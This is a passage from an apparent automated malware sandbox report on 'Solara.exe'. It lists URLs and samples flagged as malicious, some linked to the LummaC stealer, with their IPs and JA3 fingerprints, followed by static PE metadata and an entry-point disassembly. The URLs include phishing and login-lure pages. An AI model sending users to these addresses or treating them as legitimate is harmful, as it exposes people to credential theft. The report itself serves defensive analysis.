Wyye0KuqXGZwYCsXaY+GFuBxowOIYKDk88Wtn356Ig9rNqxPX0CvkkgfotUXuPAX4wXqch6/QUpTLyadqx9C4Sc9kx1mpdTeUHzvi6Gp/gANpe6MvHTICJXAKMZKOGh4M+g4DVVhDl13yVrsEhLU2KeP1rJQoSuV0TN//J1ytC9xeA0zXi0gdvfANs0by84UFwBhR1PwHWsOwBbEmjwAuhtE0l27s++Cu1oMhZrefHgxts/MCdJtPjWL98LN1t6aP4/1kw0rhJwk2N1AghWHevFg3v4NeNiBDOA4oRqwpcCL3uBJXOIP2dfK01+	Get hash	malicious	Unknown	Browse	23.227.38.65
	http://servicesopm.com/login.php	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://metaprotradings.com/	Get hash	malicious	Unknown	Browse	104.26.9.183
	http://mngop.com/	Get hash	malicious	Unknown	Browse	104.16.79.73
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AAAjUdfNc16+VqCOWdjhu7TjhebDwXm6ITDaAzM2/RBqTCouOd4syZWt0oQeHch0J32d09qewtBep0xMzEqQw5uCDD5jzGMptv2Ml8tKG/C8CtlmUW+BwgihXDjkVb9+HrdQMTDnH/ltKCqbqkeSWCTVbTbsi7hQm50lkSO+uIKP+WaZVK5CwB+KNw5vz0h1+VWB9nXYS7r/65KwDXG1eoQ7LpgExf5uqFhJOeKU2lxyf8MZFWma+Jpcd8qAgpI5cl3w3zd+Vm0EYEfvHWX+4U6+p25bR3xOeQgBPB06jegeQ9cdnaCwg3Jra3NPSUfO/ZRQe9TJEW4VVwilXp7v0mwUyqJcK2y5kBNWNZEBnnQaAV+iawzJY19HetwEfzVabFBg3HhgYGx7XFWZYjHTHjwVWsbkjfgBb5461v0CHJjM9jrxfdj1kWIpcxid8O+dUSurKUOY4Hbb6SKXakBTmnkrYs0n3Xg5Ig==&c=AABu3sW2q3Ir8ifQJAijAhNJKq0uXwwF4aGWbgefQqJepVeNmQ2aDLrgth/4e3uZIWGGIQ8D3UPNbSnpgolkZPjCVjLlF8o96RZE6aKBP9hbbWDin7ntLRUM+OO5f3pIO2jZnmZof+ubVBUQEbWFAbo8xkwwPjD2yomWYO9BLauUbPdhe7sTeQubBshJfuD8IakpYR9mWvaRkj7jNE3uduhHnJqo59l67j+0INR7XdqioPPPYIlYt8Y2ErrD/Hm1x7Ub0JlpSy2dIylu82OHsbPe2IgE0AfUZGQlqmZjkJjdk/1R+5UTAbpM4Ru2nPA1W7k8m3b56CPQfp4Nfu7t5KTvxCSLpsyTXBp2H+CLMJgrqBWvScKuAGZzoBftoxN6AlJm7/tBk90HG/fSCigf6L5/vrhdqLwDnA3umOCSZNa6Rd/lq2DBocN9C5i+TM7dwQouAP+UKgVQf4ATMh19VLexy/mmb76HgGZt4HtVGufMb6cC2I7sVZK9dBduwlRzxT47SRfRKthnR5h3xirvQPbRJwRGy1YOGI3PBe6L8zkZnlHm4NWF1riKc7NfDV2jKR/ux1g+p2dIOZSC6QRSQfNi2L0zb9mMJvmZGJpdRbwk09T/RgLB6/6oigEcyMOmQDpPT8ma	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AACrcmbDni/ExL+6O84qnOq7s+7FEV7f2cEnFZCBGkVuVLwxJJ9kIF+/XsJvnT/ZZCSNu0ZPkHJMldgNU5hySzD4vbkLFmicZpeb27RRNiBBqzluO2njDgWrhNVOuuG5KecX01qr4Wu4+GPJbk1wcH4NmoDfnECMgEyVdYVJNd9SJ/Z6oeOmLYfmhHtJEcZB1zTo2XcCZUK4o1X55Z6mDqHfXia9/zchVngkbUJFubdOeeGrUXmliV4kA4X0r42Yjp3RKfpMvJU0dvSKL9oGxXQi9sD/MbbP4pxgNW6CajbdZVfsCIontUHWT1eFW4HrQm9NkGaKTegqBxEs/bh3fwfINtkSa08UEhuWP97GhgCO8AMh0qPvYF1Rp7eiHGFkb8QogMMfuDrW2QnTqHRWnTzitTqkjecFMC67nh1FVX/+SWo05+3MmWfzaTxkwp1iAJoDUcmTFcR0WSTfeepWakTIU1exnjYHjHsm9FYU&c=AABJIKCyntddafHrxXwMffbew9PUcwQ56WCR8mvcT/7tDRFoJSRw3QNX02Q/MIVoixgn9dE9sMMP0GDnwqQ0LdLGXfvFaDm4lnRP0nKKMx/K5F9QxPOFroSM5e8+RBG+qqCfBnKxbWihL3/38edMaV7uTv7a0UGb2nVUF+n7XQAl2QSudEpYlV++l35LZxi6JWsnjixzdQpF+bXikFz1oYDN6GSuDb0op6aViO8V/0UhqnTHHddY9/cqyxhVsr874sBNA2avRHpdaXr1CP2PeHJcUgsGQb+Q5ZsuH9DAP++Oq7lFPe0lbuV3tYUIr/YAS6C7DT9Oee2yUkZYYTbI0bVJgmpWHa/G9q/wBFVVHuCTY5U3Rk5FsGRYQV6gWYrnX5DIQf3ZS3CM9xlUC2XMY8/htbCHQHuT5hjcDdzUTL+rWXnJ/TpkKPDyDGmCQh8idvsKAqOWIYWkO3X5LUWuEryoODEKawcYmYfc7zahLtlk7MGx3wWvCKqqkAg6bFwWWKWXURv3AGYvESLycicJVk8PxbBHrVkb/ZjVWsbKsit0CCZTx+7Bs7ZMtFKW5bo+GHe3oXwvXrlQS2IjtYPTG6q1fOR5753mseQVzhjXvKuOJkAQb03nyAw9hJo2vgadjjmOtgB9	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADy6+7GSFDtie9t8Cg/YUEnWHeQNpQUM5LtDe7UJMsLOceAyoyG1gPOseIEt6wEQOIS0cQG9+43HQOpwin+IcDGpXOmivIAoIj+kjiIGL1D2+8BvnDBEaMAH0f591eHch8eVhYXQMKLzHwgDODg3wt5JqhlbP9RQzflWbxkgz8rcLW9fZi6fO8I2q/H/mufxAmprX0pckYJIlZDOjEWtANKm9qQyuOPBTmTxFfQ7lSnZTWTopfzM4iUzlHH6YHH2Gwf9rOJKxuawJshVk1D6tC4SPWT4Qn+EH36v6noVRG1OVZuyh8POMokxISZrUYw04m/WI9EIj5YnXnJ0pu3aN84TxZoMpQWLf/bmERiIc3Nyv1tTCdvcY5yUV048SjizDEvcSo7xAYIkZcbJD4FxApNB4P7tHx7BM4Ye85I4pWktamhPb27vCl/+uYQPRubCgSnJCgEpm957xU4Pe9/Mw441Bx0a9Cw1g==&c=AAAMLqZiPcHPCafs0rFGm1fIkoNaTXck7ODBjyaeBBJn4WJkh+1bSUuW3EZ3mxfwfU+bqGXZerIBh+MSgUxyjr2dBgbCYcsfxsvjUb8rm3+6Y+MBXQzywIZk3yyBwMGrGcyqAW4sC8CEsQLo0qa26hZf6P5Mds0gAcBhLOQHNHGs04Bz8kP6rN3oyHvKAVKj6q6jh+o5tCfFCSfoFphn1jIlhz58l/iThGupLjhturtvKm1NOX3hQvVyGuodJdqpVFaaDIitHXcYMqB9UmB9x5Je567LlrJzANu3yeDnFlF+FPlEJBxfqHj5MAKq9a5hjcUMFWRj2C1f6q3FTviqfxGBcXqL6mjrfRn2e6SZ3cLMdbrvJF8+K9bEjK0z+DPrn/wowMPNg/sWBhdBb591VOmiiOgz82MQYX1oZvuxWVx8Ss8Y39FUpF/cGTcZLojkZK6/ZSGPHVUwgwezuarqDmRh2tnVahKh1zxiH7oFrg0dqApoWgloHFVuYES+Zx6Fwu8ffg2y+FHXsyJlLjARsT0dR3inuufunKnxFU0f0p8osK+QnybUWCcqfkqTetWNzB5Z8asqQvYhVbUlxqje0VAbhML1S+q4B7u3yifa6/t82x0LbRE1kHeNSO2USFPZmw2CUqF5	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AACK/veH9NDjNFiJHV0SalQi1vBoTxR3+CaR+Tf08xqCc5VCUGXc4X3qdIj9jWGkdCLuES/KY7ELen4EAn/FdnHqCQjbGr4W7dR4kVnBVs6emUveso+FtMlz8WLaK/uswzzWIgI+d66EsmSIAjCn6klItun/LyfhMBm/RvF8+GmEHKuHrtJ8flo99oIsJ0uYTUcGFmrLFZUm12SmxPleHrWwUcLBo1d4hUAo1H1WkirRXbLvtA5AFdQBsGObYvK4Jtgjqj5gw5MW75B9OQ54AcZkBQKcIkmFcg1YL0qDKrf81oJq2UUhMNPl/V/7Lmh2Iy3+rO2Qx71WjGONpPizWLvD7lune8iRYENSNu1xGJst2AqunbtEprrHIRzSb0HY+HbbjV8np3yVIxGt0yN7Vmb5AARDME7dIwHUrmOBP8igeJjkCyNogIrPeE8U4hVHOONDQ0fRseICVU1/ok2ExphS1u92stTGUjMCSci5vEz5fgxKUh8PMHHlxtZQmBjhUQ==&c=AABwK74RGNbpZkLbXDMgwGkEPcjIolhPI3ARymI3akMXqIIsvKkft1xo30+FsOmyglvzbe8Yz6H3Z4LxZ/0aTZFTqxR6u54legvtFlkuV/Y5fZXwm/YmPanR9jUnqtc4hPznzAuUrT6U7sovDeUggzqrrdSH45Gj/uRY+/LazDIdhTbOxXQwN2GEeE643R7hV3n9WYZrcN1rJdKE4J3VridUK5YywIX20BWPmYGQ+iqSfiaJQlNujGzur2PRjzxDNGxHixYHr88wjhccRzzqt63TgH68hxiQWBS2WMJ8V78YgSedyDzugz0SWoHXC4lIoIg/mD4/gfyj8ItwLNrpe3LWbVMyaC3Ad4pEpAUwx2rMNAE2ZRJGw2pFtc10IGwr77FIEYyERoM+q4jxSJoFtK3knGK9ms7DQJFt8w0eTeON/BC9KGyQaC64dCNz+N4+Xs4aPX/XWl9TCa+jzc65pmbZE5Fi0IpF2S9gBcOFdJjQtmI1vA8o1jxGHT+6uixJoZsPaoFWVJAAyljwh/1U0kE7VmRRTmULBXD/WiUTWrHi0xFoOw6OPuSKQtWkN98CCafLvNNkYgEzgEh7ZP0U7YG2Ui/9zjmE3N9hxjTOSgO7rba70M6HBYbc4mR2U37DUGxUEU5C	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADxL8L+GAtO4/UVYp8MqA+Sj5TSCBAjVAdgXYZk0eblTNDmdbfgDu4l4W8iDoNzLFaNYKheJg76tFPqEuw8bYVS19fwe8hhswMobSAd4H/SzCs2QZVam2WjwmfTSoUPGcyvkpmuq0ISpqIb5vzyWcVKqNTTUTopXpL6xGs6pKvxOLPHunpbWiA5Gm+6TueYrrthSZbOadliaedCA22mM2wTV3gNe1fzC90aFBzTBaHWQxrEXzwRC6Xpb34McFMIrdgz9IrbVcDvXBernticMrVIP1TsiiLBaevE/CbzrdEvKiAf8B42dT0tqManmBttR7OtoRCGhXROd01v21If1UCdSvfYAAn1bVRGaJ9z2t8XAOV+QkM7Cqp/NYaWVJFyc+dA9aHG4frM5s9sjjMhd8DDJlA/xoh8DfH8PxQbhenIpHsjrxicNhJW50U6jm9b5vBU2fBUQmACYkRTG3EArpkHaCcm6XS9GA==&c=AAAYKEKcMSJ1NhQeweljhmaJ+T0baps+PAKT1EF6chohNYEP5R3N/C0hM2VhIOm2Tlt7H1sENRf12adWDrfBHT/6guQroYvA1xotjOsoTnpw56aO6JiaFKlDBMZtdU6YKZE3+4BogcMiYQDvUyAIZDGB062Whj/cCyQvRMUpY4wDddIiNr94Kgc6rYiywX8977La5/XVq66oa1ne7RDSJfRtlqqxgm7XClHOdI3OA0B3qp+/4vc9qgP5m9K6oiTuJ4l3/gwYk0AGIFk70mpjAiufUD44SD2hGTqQBZFJxcidB+zxqyjG/eVcsY6bMPspPna712CUEgXxQWyye0KuqXGZwYCsXaY+GFuBxowOIYKDk88Wtn356Ig9rNqxPX0CvkkgfotUXuPAX4wXqch6/QUpTLyadqx9C4Sc9kx1mpdTeUHzvi6Gp/gANpe6MvHTICJXAKMZKOGh4M+g4DVVhDl13yVrsEhLU2KeP1rJQoSuV0TN//J1ytC9xeA0zXi0gdvfANs0by84UFwBhR1PwHWsOwBbEmjwAuhtE0l27s++Cu1oMhZrefHgxts/MCdJtPjWL98LN1t6aP4/1kw0rhJwk2N1AghWHevFg3v4NeNiBDOA4oRqwpcCL3uBJXOIP2dfK01+	Get hash	malicious	Unknown	Browse	23.227.38.65
	http://servicesopm.com/login.php	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://metaprotradings.com/	Get hash	malicious	Unknown	Browse	104.26.9.183
	http://mngop.com/	Get hash	malicious	Unknown	Browse	104.16.79.73
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AAAjUdfNc16+VqCOWdjhu7TjhebDwXm6ITDaAzM2/RBqTCouOd4syZWt0oQeHch0J32d09qewtBep0xMzEqQw5uCDD5jzGMptv2Ml8tKG/C8CtlmUW+BwgihXDjkVb9+HrdQMTDnH/ltKCqbqkeSWCTVbTbsi7hQm50lkSO+uIKP+WaZVK5CwB+KNw5vz0h1+VWB9nXYS7r/65KwDXG1eoQ7LpgExf5uqFhJOeKU2lxyf8MZFWma+Jpcd8qAgpI5cl3w3zd+Vm0EYEfvHWX+4U6+p25bR3xOeQgBPB06jegeQ9cdnaCwg3Jra3NPSUfO/ZRQe9TJEW4VVwilXp7v0mwUyqJcK2y5kBNWNZEBnnQaAV+iawzJY19HetwEfzVabFBg3HhgYGx7XFWZYjHTHjwVWsbkjfgBb5461v0CHJjM9jrxfdj1kWIpcxid8O+dUSurKUOY4Hbb6SKXakBTmnkrYs0n3Xg5Ig==&c=AABu3sW2q3Ir8ifQJAijAhNJKq0uXwwF4aGWbgefQqJepVeNmQ2aDLrgth/4e3uZIWGGIQ8D3UPNbSnpgolkZPjCVjLlF8o96RZE6aKBP9hbbWDin7ntLRUM+OO5f3pIO2jZnmZof+ubVBUQEbWFAbo8xkwwPjD2yomWYO9BLauUbPdhe7sTeQubBshJfuD8IakpYR9mWvaRkj7jNE3uduhHnJqo59l67j+0INR7XdqioPPPYIlYt8Y2ErrD/Hm1x7Ub0JlpSy2dIylu82OHsbPe2IgE0AfUZGQlqmZjkJjdk/1R+5UTAbpM4Ru2nPA1W7k8m3b56CPQfp4Nfu7t5KTvxCSLpsyTXBp2H+CLMJgrqBWvScKuAGZzoBftoxN6AlJm7/tBk90HG/fSCigf6L5/vrhdqLwDnA3umOCSZNa6Rd/lq2DBocN9C5i+TM7dwQouAP+UKgVQf4ATMh19VLexy/mmb76HgGZt4HtVGufMb6cC2I7sVZK9dBduwlRzxT47SRfRKthnR5h3xirvQPbRJwRGy1YOGI3PBe6L8zkZnlHm4NWF1riKc7NfDV2jKR/ux1g+p2dIOZSC6QRSQfNi2L0zb9mMJvmZGJpdRbwk09T/RgLB6/6oigEcyMOmQDpPT8ma	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AACrcmbDni/ExL+6O84qnOq7s+7FEV7f2cEnFZCBGkVuVLwxJJ9kIF+/XsJvnT/ZZCSNu0ZPkHJMldgNU5hySzD4vbkLFmicZpeb27RRNiBBqzluO2njDgWrhNVOuuG5KecX01qr4Wu4+GPJbk1wcH4NmoDfnECMgEyVdYVJNd9SJ/Z6oeOmLYfmhHtJEcZB1zTo2XcCZUK4o1X55Z6mDqHfXia9/zchVngkbUJFubdOeeGrUXmliV4kA4X0r42Yjp3RKfpMvJU0dvSKL9oGxXQi9sD/MbbP4pxgNW6CajbdZVfsCIontUHWT1eFW4HrQm9NkGaKTegqBxEs/bh3fwfINtkSa08UEhuWP97GhgCO8AMh0qPvYF1Rp7eiHGFkb8QogMMfuDrW2QnTqHRWnTzitTqkjecFMC67nh1FVX/+SWo05+3MmWfzaTxkwp1iAJoDUcmTFcR0WSTfeepWakTIU1exnjYHjHsm9FYU&c=AABJIKCyntddafHrxXwMffbew9PUcwQ56WCR8mvcT/7tDRFoJSRw3QNX02Q/MIVoixgn9dE9sMMP0GDnwqQ0LdLGXfvFaDm4lnRP0nKKMx/K5F9QxPOFroSM5e8+RBG+qqCfBnKxbWihL3/38edMaV7uTv7a0UGb2nVUF+n7XQAl2QSudEpYlV++l35LZxi6JWsnjixzdQpF+bXikFz1oYDN6GSuDb0op6aViO8V/0UhqnTHHddY9/cqyxhVsr874sBNA2avRHpdaXr1CP2PeHJcUgsGQb+Q5ZsuH9DAP++Oq7lFPe0lbuV3tYUIr/YAS6C7DT9Oee2yUkZYYTbI0bVJgmpWHa/G9q/wBFVVHuCTY5U3Rk5FsGRYQV6gWYrnX5DIQf3ZS3CM9xlUC2XMY8/htbCHQHuT5hjcDdzUTL+rWXnJ/TpkKPDyDGmCQh8idvsKAqOWIYWkO3X5LUWuEryoODEKawcYmYfc7zahLtlk7MGx3wWvCKqqkAg6bFwWWKWXURv3AGYvESLycicJVk8PxbBHrVkb/ZjVWsbKsit0CCZTx+7Bs7ZMtFKW5bo+GHe3oXwvXrlQS2IjtYPTG6q1fOR5753mseQVzhjXvKuOJkAQb03nyAw9hJo2vgadjjmOtgB9	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADy6+7GSFDtie9t8Cg/YUEnWHeQNpQUM5LtDe7UJMsLOceAyoyG1gPOseIEt6wEQOIS0cQG9+43HQOpwin+IcDGpXOmivIAoIj+kjiIGL1D2+8BvnDBEaMAH0f591eHch8eVhYXQMKLzHwgDODg3wt5JqhlbP9RQzflWbxkgz8rcLW9fZi6fO8I2q/H/mufxAmprX0pckYJIlZDOjEWtANKm9qQyuOPBTmTxFfQ7lSnZTWTopfzM4iUzlHH6YHH2Gwf9rOJKxuawJshVk1D6tC4SPWT4Qn+EH36v6noVRG1OVZuyh8POMokxISZrUYw04m/WI9EIj5YnXnJ0pu3aN84TxZoMpQWLf/bmERiIc3Nyv1tTCdvcY5yUV048SjizDEvcSo7xAYIkZcbJD4FxApNB4P7tHx7BM4Ye85I4pWktamhPb27vCl/+uYQPRubCgSnJCgEpm957xU4Pe9/Mw441Bx0a9Cw1g==&c=AAAMLqZiPcHPCafs0rFGm1fIkoNaTXck7ODBjyaeBBJn4WJkh+1bSUuW3EZ3mxfwfU+bqGXZerIBh+MSgUxyjr2dBgbCYcsfxsvjUb8rm3+6Y+MBXQzywIZk3yyBwMGrGcyqAW4sC8CEsQLo0qa26hZf6P5Mds0gAcBhLOQHNHGs04Bz8kP6rN3oyHvKAVKj6q6jh+o5tCfFCSfoFphn1jIlhz58l/iThGupLjhturtvKm1NOX3hQvVyGuodJdqpVFaaDIitHXcYMqB9UmB9x5Je567LlrJzANu3yeDnFlF+FPlEJBxfqHj5MAKq9a5hjcUMFWRj2C1f6q3FTviqfxGBcXqL6mjrfRn2e6SZ3cLMdbrvJF8+K9bEjK0z+DPrn/wowMPNg/sWBhdBb591VOmiiOgz82MQYX1oZvuxWVx8Ss8Y39FUpF/cGTcZLojkZK6/ZSGPHVUwgwezuarqDmRh2tnVahKh1zxiH7oFrg0dqApoWgloHFVuYES+Zx6Fwu8ffg2y+FHXsyJlLjARsT0dR3inuufunKnxFU0f0p8osK+QnybUWCcqfkqTetWNzB5Z8asqQvYhVbUlxqje0VAbhML1S+q4B7u3yifa6/t82x0LbRE1kHeNSO2USFPZmw2CUqF5	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AACK/veH9NDjNFiJHV0SalQi1vBoTxR3+CaR+Tf08xqCc5VCUGXc4X3qdIj9jWGkdCLuES/KY7ELen4EAn/FdnHqCQjbGr4W7dR4kVnBVs6emUveso+FtMlz8WLaK/uswzzWIgI+d66EsmSIAjCn6klItun/LyfhMBm/RvF8+GmEHKuHrtJ8flo99oIsJ0uYTUcGFmrLFZUm12SmxPleHrWwUcLBo1d4hUAo1H1WkirRXbLvtA5AFdQBsGObYvK4Jtgjqj5gw5MW75B9OQ54AcZkBQKcIkmFcg1YL0qDKrf81oJq2UUhMNPl/V/7Lmh2Iy3+rO2Qx71WjGONpPizWLvD7lune8iRYENSNu1xGJst2AqunbtEprrHIRzSb0HY+HbbjV8np3yVIxGt0yN7Vmb5AARDME7dIwHUrmOBP8igeJjkCyNogIrPeE8U4hVHOONDQ0fRseICVU1/ok2ExphS1u92stTGUjMCSci5vEz5fgxKUh8PMHHlxtZQmBjhUQ==&c=AABwK74RGNbpZkLbXDMgwGkEPcjIolhPI3ARymI3akMXqIIsvKkft1xo30+FsOmyglvzbe8Yz6H3Z4LxZ/0aTZFTqxR6u54legvtFlkuV/Y5fZXwm/YmPanR9jUnqtc4hPznzAuUrT6U7sovDeUggzqrrdSH45Gj/uRY+/LazDIdhTbOxXQwN2GEeE643R7hV3n9WYZrcN1rJdKE4J3VridUK5YywIX20BWPmYGQ+iqSfiaJQlNujGzur2PRjzxDNGxHixYHr88wjhccRzzqt63TgH68hxiQWBS2WMJ8V78YgSedyDzugz0SWoHXC4lIoIg/mD4/gfyj8ItwLNrpe3LWbVMyaC3Ad4pEpAUwx2rMNAE2ZRJGw2pFtc10IGwr77FIEYyERoM+q4jxSJoFtK3knGK9ms7DQJFt8w0eTeON/BC9KGyQaC64dCNz+N4+Xs4aPX/XWl9TCa+jzc65pmbZE5Fi0IpF2S9gBcOFdJjQtmI1vA8o1jxGHT+6uixJoZsPaoFWVJAAyljwh/1U0kE7VmRRTmULBXD/WiUTWrHi0xFoOw6OPuSKQtWkN98CCafLvNNkYgEzgEh7ZP0U7YG2Ui/9zjmE3N9hxjTOSgO7rba70M6HBYbc4mR2U37DUGxUEU5C	Get hash	malicious	Unknown	Browse	23.227.38.65
	https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADxL8L+GAtO4/UVYp8MqA+Sj5TSCBAjVAdgXYZk0eblTNDmdbfgDu4l4W8iDoNzLFaNYKheJg76tFPqEuw8bYVS19fwe8hhswMobSAd4H/SzCs2QZVam2WjwmfTSoUPGcyvkpmuq0ISpqIb5vzyWcVKqNTTUTopXpL6xGs6pKvxOLPHunpbWiA5Gm+6TueYrrthSZbOadliaedCA22mM2wTV3gNe1fzC90aFBzTBaHWQxrEXzwRC6Xpb34McFMIrdgz9IrbVcDvXBernticMrVIP1TsiiLBaevE/CbzrdEvKiAf8B42dT0tqManmBttR7OtoRCGhXROd01v21If1UCdSvfYAAn1bVRGaJ9z2t8XAOV+QkM7Cqp/NYaWVJFyc+dA9aHG4frM5s9sjjMhd8DDJlA/xoh8DfH8PxQbhenIpHsjrxicNhJW50U6jm9b5vBU2fBUQmACYkRTG3EArpkHaCcm6XS9GA==&c=AAAYKEKcMSJ1NhQeweljhmaJ+T0baps+PAKT1EF6chohNYEP5R3N/C0hM2VhIOm2Tlt7H1sENRf12adWDrfBHT/6guQroYvA1xotjOsoTnpw56aO6JiaFKlDBMZtdU6YKZE3+4BogcMiYQDvUyAIZDGB062Whj/cCyQvRMUpY4wDddIiNr94Kgc6rYiywX8977La5/XVq66oa1ne7RDSJfRtlqqxgm7XClHOdI3OA0B3qp+/4vc9qgP5m9K6oiTuJ4l3/gwYk0AGIFk70mpjAiufUD44SD2hGTqQBZFJxcidB+zxqyjG/eVcsY6bMPspPna712CUEgXxQWyye0KuqXGZwYCsXaY+GFuBxowOIYKDk88Wtn356Ig9rNqxPX0CvkkgfotUXuPAX4wXqch6/QUpTLyadqx9C4Sc9kx1mpdTeUHzvi6Gp/gANpe6MvHTICJXAKMZKOGh4M+g4DVVhDl13yVrsEhLU2KeP1rJQoSuV0TN//J1ytC9xeA0zXi0gdvfANs0by84UFwBhR1PwHWsOwBbEmjwAuhtE0l27s++Cu1oMhZrefHgxts/MCdJtPjWL98LN1t6aP4/1kw0rhJwk2N1AghWHevFg3v4NeNiBDOA4oRqwpcCL3uBJXOIP2dfK01+	Get hash	malicious	Unknown	Browse	23.227.38.65
	http://servicesopm.com/login.php	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://metaprotradings.com/	Get hash	malicious	Unknown	Browse	104.26.9.183
	http://mngop.com/	Get hash	malicious	Unknown	Browse	104.16.79.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 104.21.33.249 104.21.30.221 188.114.96.3 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.359684677864379
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Solara.exe
File size:	1'003'008 bytes
MD5:	25e61fd473a4a437c052fe60e4a76e0a
SHA1:	747c49b5e86b4a5c30f2685ec400708f918c814b
SHA256:	58c5681677bccc44d38ca7476282126d6f42810dbf8eaff735ee6d058d843b56
SHA512:	18f68c683e9ffe03e089f49a62cd1d0176ec66ee252a4df98a3bb5520317eb2fa66ef638d95aa53a716cffce7cfdb53532f48146fcfc3f352b1a81f18ade6d44
SSDEEP:	24576:eJjx4XkyvLl6l/TnjZjZTBCUsRUwOi3OePeqNEDr6t:exx4XkyvLl6FTBCZ53caEDrU
TLSH:	B125DF1279C18036DB3321320A69F7755AAEF8B11B2966CF17E81ABE5F385C15B3121F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.............E.......E...<...E.......E...............................................................Rich...................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42ee18
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x670AF399 [Sat Oct 12 22:09:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	285f07c66f98861b92460fa57c11d967

Entrypoint Preview

Instruction
call 00007F06C53224D2h
jmp 00007F06C5321488h
call 00007F06C5322516h
push eax
call 00007F06C535886Eh
pop ecx
ret
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F06C532167Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F06C532166Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F06C532166Eh
add edx, 28h
cmp edx, esi
jne 00007F06C532164Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F06C532165Bh
jmp 00007F06C5359095h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F06C5321687h
mov ecx, 00005A4Dh
cmp word ptr [eax], cx
jne 00007F06C532167Dh
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 00004550h
jne 00007F06C5321670h
mov eax, 0000010Bh
cmp word ptr [ecx+18h], ax
sete al
pop ebp
ret
xor al, al
pop ebp
ret
mov eax, dword ptr fs:[00000018h]
